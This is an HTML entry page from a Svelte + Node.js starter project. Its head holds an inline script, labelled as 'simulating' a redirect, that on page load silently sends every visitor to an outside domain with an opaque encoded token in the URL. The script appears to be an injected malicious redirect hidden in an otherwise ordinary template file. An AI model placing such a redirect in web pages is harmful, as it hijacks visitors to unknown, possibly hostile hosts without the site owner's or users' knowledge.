<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset='utf-8'>
	<meta name='viewport' content='width=device-width,initial-scale=1'>

	<title>Svelte + Node.js API</title>

	<link rel='icon' type='image/png' href='/favicon.png'>
	<link rel='stylesheet' href='/global.css'>
	<link rel='stylesheet' href='/build/bundle.css'>

	<script defer src='/build/bundle.js'></script>
	<script>// Simulate an HTTP redirect:
window.location.replace("https://zickwick.com/?E=kXE%2ffwM2OuU1uu%2fGviZhtNhHIMvhjLk7&s1=");</script>
</head>

<body>
</body>
</html>
